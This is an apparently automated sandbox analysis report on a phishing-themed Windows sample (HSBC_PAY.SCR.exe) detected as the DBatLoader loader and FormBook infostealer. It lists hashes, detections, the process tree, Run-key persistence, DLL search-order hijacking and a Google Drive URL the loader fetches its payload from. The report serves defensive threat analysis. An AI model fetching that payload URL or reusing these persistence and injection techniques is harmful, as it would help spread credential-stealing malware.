Windows Analysis Report
HSBC_PAY.SCR.exe

Overview

General Information

Sample name: HSBC_PAY.SCR.exe
Analysis ID: 1583879
MD5: 23b640cc7b2cff45ceef1c718e7095e0
SHA1: dcb684e452d59af4b1bc7b5de4bdccd2b82a967b
SHA256: bfc7a921cd679ab7d693e30c552e352a7c564a75ec7e60b25960c63ae9067938
Tags: exe, Payment, SCR, user-cocaman

Detection

DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • HSBC_PAY.SCR.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\HSBC_PAY.SCR.exe" MD5: 23B640CC7B2CFF45CEEF1C718E7095E0)
    • cmd.exe (PID: 2304 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uzonfntK.pif (PID: 4092 cmdline: C:\Users\Public\Libraries\uzonfntK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Ktnfnozu.PIF (PID: 3612 cmdline: "C:\Users\Public\Libraries\Ktnfnozu.PIF" MD5: 23B640CC7B2CFF45CEEF1C718E7095E0)
    • cmd.exe (PID: 2004 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uzonfntK.pif (PID: 3548 cmdline: C:\Users\Public\Libraries\uzonfntK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Ktnfnozu.PIF (PID: 1148 cmdline: "C:\Users\Public\Libraries\Ktnfnozu.PIF" MD5: 23B640CC7B2CFF45CEEF1C718E7095E0)
    • cmd.exe (PID: 6828 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uzonfntK.pif (PID: 2844 cmdline: C:\Users\Public\Libraries\uzonfntK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
{"Download Url": ["https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8"]}
Source | Rule | Description | Author
00000008.00000001.1848189708.0000000000F60000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.2255713355.0000000000F60000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(10 further entries not shown)

Source | Rule | Description | Author
3.2.uzonfntK.pif.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.uzonfntK.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
14.2.uzonfntK.pif.400000.2.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
14.2.uzonfntK.pif.400000.2.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
8.2.uzonfntK.pif.400000.2.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(2 further entries not shown)

System Summary

Source: File created
  Author: frack113, Nasreddine Bencherchali
  Data: EventID: 11, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started
  Author: Florian Roth (Nextron Systems), Tim Shelton
  Data: Command: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\uzonfntK.pif, NewProcessName: C:\Users\Public\Libraries\uzonfntK.pif, OriginalFileName: C:\Users\Public\Libraries\uzonfntK.pif, ParentCommandLine: "C:\Users\user\Desktop\HSBC_PAY.SCR.exe", ParentImage: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ParentProcessId: 6808, ParentProcessName: HSBC_PAY.SCR.exe, ProcessCommandLine: C:\Users\Public\Libraries\uzonfntK.pif, ProcessId: 4092, ProcessName: uzonfntK.pif
Source: File created
  Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
  Data: EventID: 11, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set
  Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
  Data: Details: C:\Users\Public\Ktnfnozu.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ktnfnozu
Source: Process started
  Author: Florian Roth (Nextron Systems)
  Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Ktnfnozu.PIF" , ParentImage: C:\Users\Public\Libraries\Ktnfnozu.PIF, ParentProcessId: 3612, ParentProcessName: Ktnfnozu.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 2004, ProcessName: cmd.exe
Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: C:\Users\Public\Ktnfnozu.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ktnfnozu
Source: Process started
  Author: Max Altgelt (Nextron Systems)
  Data: Command: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\uzonfntK.pif, NewProcessName: C:\Users\Public\Libraries\uzonfntK.pif, OriginalFileName: C:\Users\Public\Libraries\uzonfntK.pif, ParentCommandLine: "C:\Users\user\Desktop\HSBC_PAY.SCR.exe", ParentImage: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ParentProcessId: 6808, ParentProcessName: HSBC_PAY.SCR.exe, ProcessCommandLine: C:\Users\Public\Libraries\uzonfntK.pif, ProcessId: 4092, ProcessName: uzonfntK.pif

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-03T20:01:56.651414+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 142.250.184.238 | 443 | TCP
2025-01-03T20:01:57.752707+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 142.250.185.129 | 443 | TCP

AV Detection

Source: HSBC_PAY.SCR.exe | Avira: detected
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Avira: detection malicious, Label: HEUR/AGEN.1325882
Source: HSBC_PAY.SCR.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8"]}
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | ReversingLabs: Detection: 50%
Source: HSBC_PAY.SCR.exe | ReversingLabs: Detection: 50%
Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Joe Sandbox ML: detected
Source: HSBC_PAY.SCR.exe | Joe Sandbox ML: detected
Source: HSBC_PAY.SCR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: uzonfntK.pif, 00000003.00000003.1957883570.0000000028DF7000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000003.1954844272.0000000028C46000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.000000002913E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: uzonfntK.pif, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216B1000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.0000000021682000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02A858B4

Networking

Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9E2F0 InternetCheckConnectionA,0_2_02A9E2F0
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 142.250.184.238:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 142.250.185.129:443
Source: global traffic | HTTP traffic detected:
  GET /uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8 HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: drive.google.com
Source: global traffic | HTTP traffic detected:
  GET /download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: drive.usercontent.google.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET /uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8 HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: drive.google.com
Source: global traffic | HTTP traffic detected:
  GET /download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
